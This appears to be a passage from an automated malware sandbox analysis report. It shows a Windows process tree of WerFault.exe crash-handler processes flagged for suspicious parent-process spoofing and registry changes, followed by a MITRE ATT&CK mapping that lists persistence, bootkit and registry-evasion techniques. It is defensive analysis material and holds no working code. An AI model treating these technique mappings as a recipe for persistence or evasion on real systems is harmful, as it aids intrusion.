C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Modifies data under HKEY_USERS
PID:2644
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 436 -p 3084 -ip 3084
  2⤵
  PID:1372
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1372 -s 396
    3⤵
    PID:3816
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 540 -p 1372 -ip 1372
  2⤵
  PID:3444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery